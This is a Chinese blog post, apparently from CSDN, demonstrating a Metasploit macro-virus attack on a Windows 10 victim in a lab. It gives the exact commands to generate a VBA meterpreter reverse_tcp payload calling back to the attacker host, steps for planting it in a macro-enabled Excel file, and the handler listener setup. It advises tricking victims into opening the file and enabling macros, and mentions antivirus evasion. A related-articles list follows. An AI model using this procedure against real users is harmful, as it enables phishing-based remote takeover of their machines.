Metasploit之宏病毒攻击演示

最新推荐文章于 2024-08-20 18:48:02 发布
最新推荐文章于 2024-08-20 18:48:02 发布
阅读量1.2k 收藏 9
点赞数
文章标签: excel python git qt java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486447
版权

摘要:利用metasploit生成宏病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。测试环境:

受害机:win10(192.168.8.123)
攻击机:kali(192.168.8.131)

攻击演示:

1、生成能反弹会话的宏病毒代码

use windows/meterpreter/reverse_tcp
set lhost 192.168.8.131
set lport 8899
generate -t vba

2016-11-02_145622.png

2、将宏病毒植入office文件
将之前生成的宏病毒代码完整复制出来,新建一个excel文件,录制宏

2016-11-02_145835.png

编辑宏

2016-11-02_145937.png

打开左侧栏的"This Workbook",将之前复制的宏病毒代码完整的粘贴进去,保存好

2016-11-02_150022.png

保存过程中如果有如下提示,点击“否”,另存为“.xlsm”格式(启用宏的excel文件格式)

2016-11-02_150203.png

最后生成如下文件

2016-11-02_150325.png

3、设置metasploit监听返回会话

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.8.131
set lport 8899
exploit

2016-11-02_150626.png

利用社会工程学,把此文件诱导受害者点击打开,并启用宏
成功返回一个meterpreter会话

2016-11-02_150735.png

4、总结
原始生成的宏病毒代码并不具备免杀性质,需要辅以工具来达到免杀效果;
当受害者关闭带有病毒的文件后,相应的,返回的meterpreter会话也被终止。

2016-11-02_151044.png
KEY0NE
关注
Kali渗透测试:使用Word宏病毒进行渗透攻击
Liu_Bruce的博客
05-14 4488
Kali渗透测试:使用宏病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。 构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或
Metasploit 客户端漏洞利用实战
悦分享
11-28 885
客户端攻击总是一个有趣的话题,并成为今日攻击者的主要攻击目标。随着网络管理员和软件开发人员加强周边环境,测试人员需要找到一种方法让受害者为他们进入网络打开大门。客户端攻击需要用户交互,例如诱使用户点击链接,打开文档或以某种方式进入恶意网站。使用Metasploit执行客户端攻击的方式有很多种,我们将在这里演示其中的一些方法。
Word宏病毒
qq_43717119的博客
06-22 1万+
Word宏病毒 【实验目的】 1、演示宏的编写。 2、说明宏的原理及其安全漏洞和缺陷。 3、理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 【实验环境】 在windows虚拟机中演示word宏病毒的发生机制,以及如何清除病毒的一系列操作宏病毒样本:自我复制及感染病毒(copy.txt)类台湾一号病毒(No1.txt) 实验注意事项:为了保证该试验不至于造成较大破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 【实验预备知识点】 Wo
EXCEL startup.exe 宏病毒
weixin_34411563的博客
11-13 207
StartUp.xls宏病毒清除方法 第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls; 第二步:清除C:\Documents and Settings\administrator\Application Data\Micr...
钓鱼的常见几种方式
最新发布
qq_55894976的博客
08-20 1130
【代码】钓鱼的常见几种方式。
宏病毒(1)
WLINX
12-09 620
样本HASH:02BA9703D1F250B411EA4C868D17FD2E 先打开样本,发现是老版的宏警告。 然后点击启用宏,ALT+F11查看宏代码(打开之前可以按住shift,防止一切宏运行,但很多时候不好使),然后找到宏开始的地方,然后开始调试。 CTRL+F8运行到光标处,然后F8开始单步。 Sub userNaveLoadr() Dim path_Nave...
MSF利用宏病毒感染word文档获取shell复现
永远是少年
06-14 2229
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用宏病毒感染word文档获取shell复现。 一、环境准备 二、宏文档生成 三、效果检验
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
kali 单元07 渗透攻击
xiaoma920的博客
05-24 308
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。2、载入exploit/multi/browser/adobe_flash_hacking_team_uaf渗透模块,查看需要设置的参数并进行设置,启动模块。II: 检查apache2是否已经启动,没有则启动。
[网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
热门推荐
杨秀璋的专栏
07-27 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第三篇文章主要介绍木马病毒启动技术,包括创建进程API、突破SESSION0隔离、内存加载详解,希望对您有所帮助。
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
脚本/宏病毒
flowerxxxxx的博客
06-30 678
一旦发现计算机Office软件打开后弹出系统警告框,并且无法“另存为”,就表示该文件已感染宏病毒,此时不能再打开其他文件,否则病毒也会感染,应马上关闭删除该文件。(3)用Win Hex分别打开notepad.exe和notepad_upx.exe文件(2分),再比较PE头部分,用语言描述有什么不同。在“受信任位置”中,删除“可靠来源”列表框中的不安全来源,根据实际情况设置是否信任所有安装的加载项和模板,设置宏的安全性;(3)描述清除病毒及加固的方法;(注:直接答在该题下面)(5分)
恶意代码实验3:Word宏病毒实验
qq_63949327的博客
11-21 2173
只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。回答不正确三次,即可自动跳出病毒程序,但那时已经出现几十个文档。1、打开的宏编辑器如图所示,即可编写病毒代码。
台湾一号宏病毒原始源代码
家有恶妻 请勿靠近
08-01 7732
Taiwan No.1 病毒原始码  Dim Shared nm(4)  Sub MAIN  DisableInput 1  If Day(Now()) = 13 Then  try:    On Error Goto 0    On Error Goto try    test = - 1    con = 1    tog$ = ""    i =
【免杀】————3、ExcelMetasploit 和 免杀
Fly_鹏程万里
03-07 943
这篇文章主要介绍以Excel文件为载体,生成meterpreter反向shell的不同方法。 简介 这篇文章会继续讨论反向shell和规避杀毒软件的方法。有兴趣的可以看我的前一篇文章。随着时间飞逝,以前一些很好的绕过杀毒软件的方法现在均已失效。所以,我必须找到一种新的方法来隐藏我的反向shell。让我们开始吧…… …古老而简单的方法可能是最好的… 通过SMB_Deliver开启一个me...
宏病毒复现
qq_23066945的博客
11-09 1058
宏病毒复现 1、简单讲讲宏病毒 百度:宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。 运行成功能够直接getshell 2、msf生成宏病毒 msfvenom -p w...
记一次宏病毒分析
Boom!脑洞大爆炸的博客
06-18 705
记一次宏病毒分析
宏病毒实验讲解(含共享文件夹建立)
m0_57069925的博客
09-21 1035
vmware共享文件夹只是方便把文件在虚拟机和物理机直接传送要是不需要可以直接跳到第二部分看宏实验。
WPS Office宏病毒实现shell反弹
Zyecho的博客
10-21 2805
WPS Office宏病毒实现shell反弹
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值